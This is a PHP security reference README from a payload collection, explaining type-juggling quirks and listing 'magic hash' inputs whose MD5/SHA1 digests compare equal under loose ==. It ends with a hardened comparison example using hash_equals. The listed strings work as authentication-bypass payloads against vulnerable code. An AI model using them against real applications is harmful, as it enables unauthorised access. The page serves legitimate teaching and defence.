PayloadsAllTheThings/PHP juggling type/README.md
2018-09-10 20:40:43 +02:00

PHP Juggling type and magic hashes

Type Juggling

True statements

var_dump('0010e2' == '1e3');             # true
var_dump('0xABCdef' == ' 0xABCdef');     # true PHP 5.0 / false PHP 7.0
var_dump('0xABCdef' == '     0xABCdef'); # true PHP 5.0 / false PHP 7.0
var_dump('0x01' == 1);                   # true PHP 5.0 / false PHP 7.0
var_dump('0x1234Ab'       == '1193131'); # true PHP 5.0 / false PHP 7.0

'123'  == 123   # true
'123a' == 123   # true PHP 5.0 and 7.0 / false PHP 8.0
'abc'  == 0     # true PHP 5.0 and 7.0 / false PHP 8.0

'' == 0 == false == NULL
'' == 0       # true PHP 5.0 and 7.0 / false PHP 8.0
0  == false   # true
false == NULL # true
NULL == ''    # true

NULL statements

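var_dump(sha1([])); # NULL (with a warning) in PHP 5 and 7 / TypeError in PHP 8.0
var_dump(md5([]));  # NULL (with a warning) in PHP 5 and 7 / TypeError in PHP 8.0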

Magic Hashes - Exploit

<?php
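// Each digest below has the form 0e<digits>, so == compares them as the float 0.
var_dump(md5('240610708') == md5('QNKCDZO'));   # true
var_dump(md5('aabg7XSs')  == md5('aabC9RqS'));  # true
var_dump(sha1('aaroZmOk') == sha1('aaK1STfY')); # true
var_dump(sha1('aaO8zKZF') == sha1('aa3OFF9m')); # true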
?>

| Hash | "Magic" Number / String | Magic Hash | Found By |
| ---- | ----------------------- | ---------- | -------- |
| MD5  | 240610708 | 0e462097431906509019562988736854 | Michal Spacek |
| SHA1 | 10932435112 | 0e07766915004133176347055865026311692244 | Independently found by Michael A. Cleverly & Michele Spagnuolo & Rogdham |
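
The loose digest comparison shown above next to a hardened form, as an added example that is not part of the original README. The function names verify_loose, verify_strict and is_magic_digest are hypothetical; the MD5 pair is the one listed on this page.

```php
<?php
// Added example; function names are hypothetical, not from the README.

// Vulnerable form: "==" sees two digests of the shape 0e<digits> as numeric
// strings in scientific notation and compares them as floats (both are 0).
function verify_loose($storedDigest, $input)
{
    return md5($input) == $storedDigest;
}

// Hardened form: refuse non-string input (md5() of an array yields NULL or a
// TypeError depending on the PHP version), then compare as strings with
// hash_equals() (PHP 5.6+), which never converts types and is timing-safe.
function verify_strict($storedDigest, $input)
{
    if (!is_string($storedDigest) || !is_string($input)) {
        return false;
    }
    return hash_equals($storedDigest, md5($input));
}

// Audit helper: flag stored digests that loose comparison would read as zero.
function is_magic_digest($digest)
{
    return is_string($digest) && preg_match('/^0+e[0-9]+$/i', $digest) === 1;
}

$stored = md5('240610708'); // MD5 pair taken from this page

$cases = array('240610708', 'QNKCDZO', array());
foreach ($cases as $input) {
    $label = is_string($input) ? $input : gettype($input);
    // verify_loose() is only called on strings so the script also runs on PHP 8.
    $loose = is_string($input) ? var_export(verify_loose($stored, $input), true) : 'n/a';
    printf("%-10s loose=%-5s strict=%s\n", $label, $loose,
        var_export(verify_strict($stored, $input), true));
}
printf("stored digest is magic: %s\n", var_export(is_magic_digest($stored), true));
```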

Thanks to